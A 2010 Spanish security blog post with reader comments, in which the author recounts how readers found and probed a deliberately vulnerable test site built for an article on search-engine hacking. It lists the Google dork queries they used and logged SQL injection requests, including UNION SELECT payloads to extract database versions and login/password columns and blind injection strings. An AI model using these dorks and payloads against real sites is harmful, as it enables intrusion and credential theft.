lunes, abril 05, 2010

Auditorías web for free

Desde hace tiempo tengo la sensación, algunas veces más que contrastada, de que poner un link en este blog es como pedir una auditoría web gratuita para ese sitio. Basta con poner el link de una web de lo que sea para que alguien (o algunos) le pasen un escaneo completo al sitio para encontar los RFI, los XSS, los SQLi, los Blind, los fallos, los robots.txt. Esto ya me pasó con un par de webs en las que me tocó ayudarles a corregir los problemas que tenían entonces porque me sentía responsable.

La verdad es que yo también soy de los que se me caen las cosas sobre el teclado para introducir cosas cualquier parámetro con cara de sospechoso...

El caso es que, sabiendo este comportamiento, hace tiempo que intento salvaguardar algunos sitios, pero ciertas veces no lo consigo del todo. Y este es el caso del artículo de "Buscadores como arma de destrucción masiva" que estamos escribiendo Enrique Rando y yo. Para ello Enrique se ha creado, en un hosting gratuito, una web sintética que simula ser vulnerable a LFI y SQLi, para indexarla y hacerla perrerías.

Como no queríamos que nadie enredara, en lugar de avisar que es sintética, lo que hicimos fue intentar borrar la URL, pero... dio igual, porque al poco de estar publicado el post empezó a haber mucho tráfico en esa web. Tráfico que venía de los buscadores, donde alguno de vostros había hecho Google Hacking buscando la info que se ve en las imágenes:

jospeh almond rudy asfghjk
units - "the complementary page"
"Units - The complementary Page"
units converter.php almond rudy
units "the complementary page"
inurl:converter.php?id=0+union+select
inurl:converter.php?id=0+union
intitle:"Units - The complementary"
intitle:Units - The complementary Page


Y, por supuesto, una vez encontrada la URL... ¡a la carga!

/converter.php?id=0+union+select+database(),+p+from+us
/converter.php?id=0+union+select+version(),+p+from+us
/converter.php?id=0+union+select+group_concat%20version%20%20%20%2C+p+from+us
/converter.php?id=0%20union%20select%20login,password%20from%20tabla_usuarios%20--
/converter.php?id=0%20union%20select%20n,%20p%20from%20pa'%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3E255--&plx=1
/converter.php?id=0%20union%20select%20n,%20p%20from%20pa/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)%3C255&plx=1
/converter.php?id=0'))%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3E255
/converter.php?id=0+union+select+version(),n,+p+from+us&plx=1
/archive.php?id=2%27


Curiosamente, el tráfico que se generó a partir de los buscadores ese día, hizo que la relevancia de la web subiera lo suficiente ese día como para ser el quinto resultado con el título de la web


La pagina complementaria

En fin, que la próxima vez que vaya a hacer una auditoría a una web, antes la paso por aquí para que la déis un repasito vosotros antes. }:P

Saludos Malignos!

PD: ¿Te pongo un link a tu web?

7 comentarios:

  1. Quizá, y sólo quizá, tengo un teclado un poco viejo, es decir, si presiono una tecla, como mucho, sale dicha tecla, a excepción de las superiores, que me permiten abrir la cálculadora, el correo...

    Ahora bien, ¿Como co**, es posible que alguno tenga la mala suerte de tener en una de esas teclas una macro con el siguiente código: /converter.php?id=0+union+select+database(),+p+from+us ?

    un saludo,
    WiNSoCk.

    ResponderEliminar
  2. Hombre, pues ya puestos, tengo por aquí yo una página que... XD

    ResponderEliminar
  3. Winsock, ni imaginas las querys que se pueden llegar a escribir cuando se te cae la taza de café encima del teclado

    /ts

    ResponderEliminar
  4. Increíble xD
    Espero que no auditen demasiado xD

    Un saludo

    ResponderEliminar
  5. Antes de poner el enlace por aquí se lo paso a los compas del FTSAI, que llevan ni se sabe pidiéndome que se se lo diera.

    Para mi desgracia, hace una semana subí al hosting, a "prepro" lo que tenía hecho... Y no es que se rompiera por todos lados, peeero como que algunas cosas no hacían lo mismo que en la parte de desarollo. :(

    En cuanto consiga que haga lo que esperaba que hiciera... aviso.

    ResponderEliminar
  6. Don Chema :))

    Ahí le va un link, gracias;) websolutions.click
    Si no existiensen !Hackers, habría que inventarlos.

    ResponderEliminar